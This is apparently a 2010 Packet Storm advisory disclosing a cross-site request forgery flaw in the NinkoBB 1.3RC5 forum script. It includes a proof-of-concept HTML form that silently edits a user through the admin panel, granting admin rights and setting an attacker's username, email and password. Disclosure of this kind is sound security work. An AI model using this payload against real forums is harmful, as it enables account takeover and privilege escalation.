NinkoBB 1.3RC5 Cross Site Request Forgery

2010-07-01T00:00:00
ID PACKETSTORM:91357
Type packetstorm
Reporter ADEO Security
Modified 2010-07-01T00:00:00

Description

                                        
                                            `  
  
# Title: NinkoBB CSRF Vulnerability  
# Author: ADEO Security  
# Published: 30/06/2010  
# Version: 1.3RC5 (Possible all versions)  
# Vendor: http://ninkobb.com  
# Download: http://ninkobb.com/releases/?NinkoBB-1.3RC5.zip  
  
# Description: "NinkoBB is an open source forum script written in the  
PHP language and uses a MySQL Database.  
NinkoBB is designed to be as simple as possible and provide you with  
the key features that you need, all the while keeping the space used  
on your server to a minimum.  
Built to be simple, small, and easy to use with a user friendly  
install for a quick setup, painless upgrade system, and easy to use  
admin panel for managing your forum. Also includes support for  
categories, plugins, languages, and themes."  
  
# Credit: Vulnerability founded by Canberk BOLAT at ADEO Security Labs  
- Mail: security[AT]adeo.com.tr  
- Web: http://security.adeo.com.tr  
  
# Vulnerability:  
If administrator of the board browse PoC attacker can gain privilege  
access. See #PoC section.  
  
# PoC:  
<html>  
<body>  
<form method="post" action="http://ninkobb.test/admin.php?a=users&edit=1">  
<input type="hidden" name="username" value="attackers_uname">  
<input type="hidden" name="admin" value="true">  
<input type="hidden" name="email" value="attackers_mail@mail.com">  
<input type="hidden" name="npassword" value="adeopass">  
<input type="hidden" name="npassworda" value="adeopass">  
<input type="hidden" name="edit" value="submit">  
</form>  
  
</body>  
</html>  
  
  
`